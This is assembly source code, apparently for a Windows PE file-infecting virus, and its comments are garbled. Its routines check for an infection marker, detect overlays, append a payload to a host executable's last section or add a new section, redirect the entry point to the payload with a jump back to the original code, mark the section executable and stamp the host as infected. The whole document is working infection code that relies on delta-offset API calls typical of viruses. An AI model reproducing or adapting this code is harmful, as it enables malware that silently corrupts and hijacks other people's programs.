;===============================================================================;
; IsInfect
;:   ?
;:
;	hMap -   
;===============================================================================;
IsInfect proc hMap:DWORD
	startproc
;  PE-
	assume edi:ptr IMAGE_DOS_HEADER
	mov edi,hMap
	add edi,[edi].e_lfanew
;   
	add edi,4
;   
	add edi,sizeof IMAGE_FILE_HEADER
;    ?
	assume edi:PTR IMAGE_OPTIONAL_HEADER
	.IF [edi].Win32VersionValue==00BADF11Eh
		mov eax,1;  
		endproc
		ret
	.ENDIF
	mov eax,0
	endproc
	ret
IsInfect endp
;===============================================================================;


;===============================================================================;
; GetAlignUp
;:
; - 
;:  ForAlign -   
;	AlignFact -  
;:eax -  
;===============================================================================;
GetAlignUp macro ForAlign,AlignFact
	mov esi,ForAlign
	mov edi,AlignFact
	dec edi
	add esi,edi
	not edi
	and esi,edi
	mov eax,esi
endm
;===============================================================================;


;===============================================================================;
; IsOverlay
;:
;    PE ?
;:  
;	hMap - PE-
;	FileSize -  
;: EAX = 1 - , EAX = 0 - 
;===============================================================================;
IsOverlay proc FileSize:DWORD,hMap:DWORD
LOCAL pOptionalHeader:DWORD
LOCAL pFileHeader:DWORD
LOCAL pSectionHeader:DWORD
LOCAL pLastSection:DWORD
LOCAL FileAlignment:DWORD
LOCAL pDataDirectory:DWORD
LOCAL pSectionTable:DWORD
;  PE-
	assume edi:ptr IMAGE_DOS_HEADER
	mov edi,hMap
	add edi,[edi].e_lfanew
;   
	add edi,4
	mov pFileHeader,edi
;   
	add edi,sizeof IMAGE_FILE_HEADER
	mov pOptionalHeader,edi
	assume edi:ptr IMAGE_OPTIONAL_HEADER
	push DWORD PTR [edi].FileAlignment
	pop FileAlignment
;   
	lea edi,[edi].DataDirectory
	mov pDataDirectory,edi
;   
	mov edi,pOptionalHeader
	mov eax,[edi].NumberOfRvaAndSizes
	mov edi,pDataDirectory
	mov edx,sizeof IMAGE_DATA_DIRECTORY
	mul edx
	add edi,eax
	mov pSectionTable,edi
;     
	mov edi,pFileHeader
	assume edi:ptr IMAGE_FILE_HEADER
	xor ecx,ecx
	mov cx,word ptr [edi].NumberOfSections
	mov edi,pSectionTable
	assume edi:ptr IMAGE_SECTION_HEADER
	mov eax,[edi].PointerToRawData
	push ebx
	mov ebx,[edi].VirtualAddress
	add edi,sizeof IMAGE_SECTION_HEADER
	dec ecx
NextSection:
.IF (eax<[edi].PointerToRawData)&&(ebx<[edi].VirtualAddress)
	mov eax,[edi].PointerToRawData
	mov ebx,[edi].VirtualAddress
	mov pLastSection,edi;     
.ENDIF
add edi,sizeof IMAGE_SECTION_HEADER
	loop NextSection
;  ?
	mov edi,pLastSection
	mov edx,[edi].SizeOfRawData
	push edi
	GetAlignUp edx,FileAlignment
	pop edi
	add eax,[edi].PointerToRawData; EAX -     
	pop ebx
	.IF eax<FileSize
		mov eax,1; !
		ret
	.ENDIF
	mov eax,0
	ret
IsOverlay endp
;===============================================================================;


;===============================================================================;
; InfectExLastSection
;:
; PE-     
;:  hMap - 
;	hMap2 - 
;	File2Size -  
;	Delta - -
;: EAX = 1  ,  EAX = 0
;===============================================================================;
InfectExLastSection proc Name2:DWORD,hMap:DWORD,hMap2:DWORD,File2Size:DWORD,Delta:DWORD
LOCAL	pPE:DWORD
LOCAL	pSectionTable:DWORD
LOCAL	pDataDirectory:DWORD
LOCAL	pFileHeader:DWORD
LOCAL 	pOptionalHeader:DWORD
LOCAL 	SizeOfCode:DWORD
LOCAL	AddressOfCode:DWORD
LOCAL 	pLastSection:DWORD
LOCAL 	hFile:DWORD
LOCAL 	UpdatedhMap:DWORD
LOCAL 	hMapping:DWORD
LOCAL 	FileSize:DWORD

	mov eax,File2Size
	add eax,7
	push eax

	push hMap
	call GetFileAlignment
	pop esi
	mov edi,eax
	GetAlignUp esi,edi
	push eax

	push NULL
	push FILE_ATTRIBUTE_NORMAL
	push OPEN_EXISTING
	push NULL
	push FILE_SHARE_WRITE or FILE_SHARE_READ
	push GENERIC_WRITE or GENERIC_READ
	push Name2
	mov edx,Delta
	call dword ptr [edx+_CreateFileA]

	.if eax==-1
		xor eax,eax
		ret
	.endif 
	mov hFile,eax

	push 0
	push hFile
	mov edx,Delta
	call dword ptr [edx+_GetFileSize]
	
	push 0
	push hFile
	mov edx,Delta
	call dword ptr [edx+_GetFileSize]
	mov FileSize,eax
	
	pop esi
	add esi,eax
;   EXE-
	push NULL
	push esi
	push NULL
	push PAGE_READWRITE
	push NULL
	push hFile
	mov edx,Delta
	call dword ptr [edx+_CreateFileMappingA]
	.if eax==0
		xor eax,eax
		ret
	.endif
	mov hMapping,eax
	push 0
	push 0
	push 0
	push FILE_MAP_ALL_ACCESS
	push eax
	mov edx,Delta
	call dword ptr [edx+_MapViewOfFile]
	.if eax==0
		jmp cl2
		ret
	.endif
	mov UpdatedhMap,eax
;  PE-    
	push UpdatedhMap
	pop hMap

	push hMap
	call ValidPE
	.IF eax==0
		jmp cl2
		ret
	.ENDIF
;  PE-
	assume edi:ptr IMAGE_DOS_HEADER
	mov edi,hMap
	add edi,[edi].e_lfanew
	mov pPE,edi
;   
	add edi,4
	mov pFileHeader,edi
;   
	add edi,sizeof IMAGE_FILE_HEADER
	mov pOptionalHeader,edi
;   
	assume edi:ptr IMAGE_OPTIONAL_HEADER
	lea edi,[edi].DataDirectory
	mov pDataDirectory,edi
;   
	mov edi,pOptionalHeader
	mov eax,[edi].NumberOfRvaAndSizes
	mov edi,pDataDirectory
	mov ecx,sizeof IMAGE_DATA_DIRECTORY
	mul ecx
	add edi,eax
	mov pSectionTable,edi
;    ?
;................................
;     
	mov edi,pFileHeader
	assume edi:ptr IMAGE_FILE_HEADER
	xor ecx,ecx
	mov cx,word ptr [edi].NumberOfSections
	mov edi,pSectionTable
	assume edi:ptr IMAGE_SECTION_HEADER
	mov eax,[edi].PointerToRawData
	push ebx
	mov ebx,[edi].VirtualAddress
	add edi,sizeof IMAGE_SECTION_HEADER
	dec ecx
NextSection:
	.IF (eax<[edi].PointerToRawData)&&(ebx<[edi].VirtualAddress)
		mov eax,[edi].PointerToRawData
		mov ebx,[edi].VirtualAddress
		mov pLastSection,edi;     
	.ENDIF
	add edi,sizeof IMAGE_SECTION_HEADER
loop NextSection
	pop ebx
;    ?
	mov edi,pLastSection
	.IF [edi].SizeOfRawData==0;  
		jmp cl2
		ret
	.ENDIF
;    
	mov ecx,File2Size; ,   
	mov edi,pLastSection
	mov eax,[edi].PointerToRawData
	add eax,[edi].SizeOfRawData
	add eax,hMap
	mov edi,eax
	mov esi,hMap2
	rep movsb; 
;    
	mov esi,pOptionalHeader
	assume esi:ptr IMAGE_OPTIONAL_HEADER
	mov eax,[esi].AddressOfEntryPoint; EAX -   
	add eax,[esi].ImageBase
	mov byte ptr [edi],0B8h;BF -   mov edi,XXXXXXX
	inc edi
	push eax
	pop dword ptr [edi];    
	add edi,4
	mov word ptr [edi],0E0FFh;FFE0 -   jmp edi
; AddressOfEntryPoint
	mov edi,pLastSection
	assume edi:ptr IMAGE_SECTION_HEADER
	mov eax,[edi].VirtualAddress
	add eax,[edi].SizeOfRawData
	mov edi,pOptionalHeader
	assume edi:ptr IMAGE_OPTIONAL_HEADER
	lea edi,[edi].AddressOfEntryPoint
	mov dword ptr [edi],eax
;-...
	assume edi:ptr IMAGE_SECTION_HEADER
	mov edi,pLastSection
	mov eax,[edi].Misc.VirtualSize
	mov ecx,File2Size
	add ecx,7
	add eax,ecx

	mov edi,pOptionalHeader
	assume edi:ptr IMAGE_OPTIONAL_HEADER

	mov edi,[edi].SectionAlignment
	mov esi,eax
	GetAlignUp esi,edi

	mov edi,pLastSection
	assume edi:ptr IMAGE_SECTION_HEADER
	lea esi,[edi].Misc.VirtualSize
	mov dword ptr [esi],eax; VirtualSize

	mov esi,[edi].SizeOfRawData
	add esi,ecx

	mov edi,pOptionalHeader
	assume edi:ptr IMAGE_OPTIONAL_HEADER
	mov edi,[edi].FileAlignment
	GetAlignUp esi,edi
	mov edi,pLastSection
	assume edi:ptr IMAGE_SECTION_HEADER
	lea edi,[edi].SizeOfRawData
	mov dword ptr [edi],eax; SizeOfRawData

	mov edi,pLastSection
	assume edi:ptr IMAGE_SECTION_HEADER
	lea esi,[edi].Misc.VirtualSize
	mov dword ptr [esi],eax; VirtualSize

	mov edi,pLastSection
	mov [edi].Characteristics,0a0000020H; 

	mov esi,pOptionalHeader
	assume esi:ptr IMAGE_OPTIONAL_HEADER
	mov eax,[edi].Misc.VirtualSize
	add eax,[edi].VirtualAddress

	lea edi,[esi].SizeOfImage; ImageSize
	mov dword ptr [edi],eax
;   
	mov edi,pOptionalHeader
	assume edi:PTR IMAGE_OPTIONAL_HEADER
	lea edi,[edi].Win32VersionValue
	mov DWORD PTR [edi],00BADF11Eh
cl2:
	mov edx,Delta
	push hMapping
	call dword ptr [edx+_CloseHandle]
	mov edx,Delta
	push hFile
	call dword ptr [edx+_CloseHandle]
	push UpdatedhMap
	mov edx,Delta
	call dword ptr [edx+_UnmapViewOfFile]
	mov eax,1
	ret
InfectExLastSection endp
;===============================================================================;


;===============================================================================;
; GetFileAlignment
; - 
;: 
; hMap -    
;: eax -  FileAlignment
;===============================================================================;
GetFileAlignment proc hMap:DWORD
	mov edi,hMap
;  PE-
	assume edi:ptr IMAGE_DOS_HEADER
	add edi,[edi].e_lfanew
;   
	add edi,4
;   
	add edi,sizeof IMAGE_FILE_HEADER
	assume edi:ptr IMAGE_OPTIONAL_HEADER
	mov eax,[edi].FileAlignment
	ret
GetFileAlignment endp
;===============================================================================;


;===============================================================================;
; NewSection
;:
;    PE-
;:  
;	FileName -   
;	hMap - 
;	hMap2 - 
;	File2Size -  
;	Delta - -
;: EAX = 1  ,  .
;===============================================================================;
NewSection proc FileName:DWORD,hMap:DWORD,Delta:DWORD
LOCAL	hFile:DWORD
LOCAL	FileSize:DWORD
LOCAL   pOptionalHeader:DWORD
LOCAL   pDataDirectory:DWORD
LOCAL   pSectionTable:DWORD
LOCAL   pLastSection:DWORD
LOCAL 	AddressOfCode:DWORD
LOCAL 	pFileHeader:DWORD
LOCAL 	hMapping:DWORD
;  
	push NULL
	push FILE_ATTRIBUTE_NORMAL
	push OPEN_EXISTING
	push NULL
	push FILE_SHARE_READ or FILE_SHARE_WRITE
	push GENERIC_WRITE or GENERIC_READ
	push FileName
	mov edx,Delta
	call dword ptr [edx+_CreateFileA]		

	mov hFile,eax
	push 0
	push hFile
	mov edx,Delta
	call dword ptr [edx+_GetFileSize]
	mov FileSize,eax

	push eax
	push hMap
	call GetFileAlignment
	mov esi,eax
	pop eax
	add esi,eax; esi -   
;File Mapping Instructions
	push NULL
	push esi
	push NULL
	push PAGE_READWRITE
	push NULL
	push hFile
	mov edx,Delta
	call dword ptr [edx+_CreateFileMappingA]

	mov hMapping,eax
	push 0
	push 0
	push 0
	push FILE_MAP_ALL_ACCESS
	push eax
	mov edx,Delta
	call dword ptr [edx+_MapViewOfFile]
	mov hMap,eax
;  PE-    
	.IF hMap==0;  
		jmp cl1
	.ENDIF
	push hMap
	call ValidPE
	.IF eax==0
		jmp cl1
	.ENDIF
;  PE-
	assume edi:ptr IMAGE_DOS_HEADER
	mov edi,hMap
	add edi,[edi].e_lfanew
;   
	add edi,4
	mov pFileHeader,edi
;   
	add edi,sizeof IMAGE_FILE_HEADER
	mov pOptionalHeader,edi
;   
	assume edi:ptr IMAGE_OPTIONAL_HEADER
	lea edi,[edi].DataDirectory
	mov pDataDirectory,edi
;   
	mov edi,pOptionalHeader
	mov eax,[edi].NumberOfRvaAndSizes
	mov edi,pDataDirectory
	mov edx,sizeof IMAGE_DATA_DIRECTORY
	mul edx
	add edi,eax
	mov pSectionTable,edi
;   
	mov edi,pFileHeader
	assume edi:ptr IMAGE_FILE_HEADER
	xor ecx,ecx
	mov cx,word ptr [edi].NumberOfSections
	mov edi,pSectionTable
	assume edi:ptr IMAGE_SECTION_HEADER
	mov eax,[edi].VirtualAddress
	add edi,sizeof IMAGE_SECTION_HEADER
	dec ecx
NextSection:
	.IF (eax<[edi].VirtualAddress)
		mov eax,[edi].VirtualAddress
		mov pLastSection,edi;     
	.ENDIF
	add edi,sizeof IMAGE_SECTION_HEADER
loop NextSection
;   Bound-
	mov edi,pDataDirectory
	mov edx,sizeof IMAGE_DATA_DIRECTORY
	mov eax,IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT
	mul edx
	add edi,eax; EDI -       
	cld
	mov al,0
	mov ecx,sizeof IMAGE_DATA_DIRECTORY
	rep stosb;     bound-
;   +1
	mov edi,pFileHeader
	assume edi:ptr IMAGE_FILE_HEADER
	xor eax,eax
	mov ax,[edi].NumberOfSections
	mov edx,sizeof IMAGE_SECTION_HEADER
	mul edx;  eax -     
	mov edi,pSectionTable
	add edi,eax;  edi -       
	mov AddressOfCode,edi;    
;    
	mov edi,pLastSection
	assume edi:ptr IMAGE_SECTION_HEADER
	mov eax,[edi].VirtualAddress
	add eax,[edi].SizeOfRawData
	push eax

	mov esi,pOptionalHeader
	assume esi:ptr IMAGE_OPTIONAL_HEADER
	mov eax,[esi].SectionAlignment

	pop esi
	mov edi,eax
	GetAlignUp esi,edi;eax -    
	push eax
;     
	mov edi,AddressOfCode
	mov ecx,40; IMAGE_SECTION_HEADER
	mov al,0
	rep stosb
;    
	mov edi,AddressOfCode
	assume edi:ptr IMAGE_SECTION_HEADER
	mov dword ptr [edi].Name1,'slt.'; 

	assume esi:ptr IMAGE_OPTIONAL_HEADER
	mov esi,pOptionalHeader
	mov eax,[esi].FileAlignment

	mov dword ptr [edi].Misc.VirtualSize,eax
	pop dword ptr [edi].VirtualAddress

	push edi
	mov esi,eax
	push esi

	assume esi:ptr IMAGE_OPTIONAL_HEADER
	mov esi,pOptionalHeader
	mov eax,[esi].FileAlignment
	mov edi,eax
	pop esi
	GetAlignUp esi,edi
	pop edi
	mov dword ptr [edi].SizeOfRawData,eax

	mov eax,FileSize
	mov dword ptr [edi].PointerToRawData,eax
	mov dword ptr [edi].Characteristics,40000040H

	mov edi,AddressOfCode
	assume edi:ptr IMAGE_SECTION_HEADER
;
	assume esi:ptr IMAGE_OPTIONAL_HEADER
	mov esi,pOptionalHeader
	mov ecx,[esi].FileAlignment

	mov al,0
	mov edi,FileSize
	add edi,hMap
	rep stosb;
; ImageSize
	mov edi,pLastSection
	add edi,sizeof IMAGE_SECTION_HEADER
	assume edi:ptr IMAGE_SECTION_HEADER
	mov eax,[edi].Misc.VirtualSize
	add eax,[edi].VirtualAddress
	mov edi,pOptionalHeader
	assume edi:ptr IMAGE_OPTIONAL_HEADER
	lea edi,[edi].SizeOfImage; ImageSize
	mov dword ptr [edi],eax
; Number Of Section
	mov edi,pFileHeader
	assume edi:ptr IMAGE_FILE_HEADER
	lea edi,[edi].NumberOfSections
	inc word ptr [edi]
cl1:
	push hFile
	mov edx,Delta
	call dword ptr [edx+_CloseHandle]
	push hMapping
	mov edx,Delta
	call dword ptr [edx+_CloseHandle]
	push hMap
	mov edx,Delta
	call dword ptr [edx+_UnmapViewOfFile]
	ret
NewSection endp
;=============================================================================;